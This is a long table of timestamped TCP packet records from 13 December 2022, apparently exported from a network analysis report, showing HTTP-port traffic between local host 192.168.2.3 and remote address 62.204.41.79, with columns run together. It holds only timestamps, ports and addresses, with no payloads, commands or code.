                                              Dec 13, 2022 20:09:21.673449993 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.673537970 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.673764944 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.673974037 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.674077034 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.674175024 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.674271107 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.674365997 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.674488068 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.674952030 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.675076008 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.675168037 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.675257921 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.675344944 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.675432920 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.675533056 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.675643921 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.675733089 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.675820112 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.675965071 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.676093102 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.676275969 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.676428080 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.676569939 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.676707029 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.676811934 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.676909924 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.677005053 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.677099943 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.677226067 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.677393913 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.677491903 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.677591085 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.677686930 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.677793980 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.677880049 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.677977085 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.678075075 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.678170919 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.678286076 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.678411007 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.707601070 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.707720995 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.707823038 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.707914114 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.708003998 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.708091021 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.708180904 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.708268881 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.708354950 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.708441019 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.708528996 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.708616018 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.708703995 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.708791971 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.708880901 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.708970070 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.709064960 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.709151030 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.709240913 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.709333897 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.709414005 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.709506989 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.709589005 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.709677935 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.709769011 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.709868908 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.709992886 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.710118055 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.710237026 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.710364103 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.710489035 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.710566998 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.710594893 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.710618973 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.710639954 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.710679054 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.710742950 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.711076975 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.711117983 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.711179972 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.711199045 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.711208105 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.711216927 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.711234093 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.711251974 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.711328030 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.711421967 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.711456060 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.711582899 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.711689949 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.711708069 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.711829901 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.711956024 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.712078094 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.712202072 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.712327003 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.712457895 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.712584019 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.712707043 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.712829113 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.712954998 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.713077068 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.713202000 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.713325024 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.713453054 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.724559069 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.724603891 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.724632025 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.733520985 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.733567953 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.733589888 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.733606100 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.733707905 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.733736038 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.733877897 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.733915091 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.733978987 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.734340906 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.734605074 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.734635115 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.735008955 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.735199928 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.735385895 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.735804081 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.735856056 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.736835003 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.736884117 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.736912012 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.736943960 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.737309933 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.737495899 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.737688065 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.737725019 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.738146067 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.738192081 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.738224030 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.739078999 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.739116907 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.759330034 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.759427071 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.759510040 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.759599924 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.759701014 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.759787083 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.759876966 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.759968042 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.760055065 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.760143995 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.760234118 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.760324955 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.760410070 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.760497093 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.760586977 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.760674000 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.760761976 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.760849953 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.768908024 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.768955946 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.768969059 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.768985987 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.769025087 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.769115925 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.769138098 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.769157887 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.769265890 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.769413948 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.770006895 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.770052910 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.770106077 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.770123959 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.770148039 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.770174980 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.770246029 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.770404100 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.770426989 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.770446062 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.770462990 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.770564079 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.770699978 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.770720959 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.770893097 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.771039963 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.771116972 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.771193981 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.771601915 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.771733999 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.771817923 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.771970034 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.772061110 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.772197962 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.772238970 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.772357941 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.772401094 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.772519112 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.772562027 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.772655010 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.772712946 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.772735119 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.772747040 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.772834063 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.772924900 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.772959948 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.773016930 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.773055077 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.773154020 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.773278952 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.773438931 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.773554087 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.773680925 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.773894072 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.773924112 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.785114050 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.785295010 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.785430908 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.785553932 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.785674095 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.785789013 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.785903931 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.786122084 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.786122084 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.786238909 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.786355019 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.786468029 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.786581039 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.786696911 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.786814928 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.786988020 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.787111044 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.787230968 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.787348986 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.787467003 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.787583113 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.787699938 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.787812948 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.788033009 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.788033009 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.788144112 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.788260937 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.792968988 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.793112993 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.793232918 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.793353081 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.793472052 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.793586016 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.793703079 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.793811083 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.793932915 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.794065952 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.794194937 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.794451952 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.794451952 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.794579983 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.794708014 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.794833899 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.794966936 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.795094013 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.795222998 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.795360088 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.795480967 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.795615911 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.795746088 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.795883894 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.796005011 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.796123028 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.796255112 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.796375990 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.796503067 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.796628952 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.796756983 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.796880960 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.796998024 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.797111988 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.797233105 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.797378063 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.797501087 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.797624111 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.797745943 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.797871113 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.798008919 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.798122883 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.798243999 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.798367023 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.798489094 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.798612118 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.798733950 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.798850060 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.798969030 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.799082041 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.799201965 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.799448967 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.799448967 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.801665068 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.802120924 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.802179098 CET4975180192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.802587032 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.802835941 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.803044081 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.803258896 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.803471088 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.803683043 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.803911924 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.804092884 CET4975280192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.804203987 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.804291964 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.804382086 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.804498911 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.804909945 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.804997921 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.805083990 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.805172920 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.805308104 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.805428982 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.805670977 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.805797100 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.805934906 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.806123018 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.806245089 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.806370974 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.806499958 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.806626081 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.806757927 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.806988955 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.807104111 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.807194948 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.810630083 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.810863018 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.810992002 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.820339918 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.820403099 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.820422888 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.820435047 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.820451975 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.820471048 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.820589066 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.820606947 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.820722103 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.820768118 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.820883989 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.821050882 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.821120977 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.821156979 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.821286917 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.821316004 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.833177090 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.833214045 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.833233118 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.833250046 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.833292007 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.833498955 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.833519936 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.839086056 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.839243889 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.839373112 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.839497089 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:21.846045971 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:21.846091986 CET804973662.204.41.79192.168.2.3
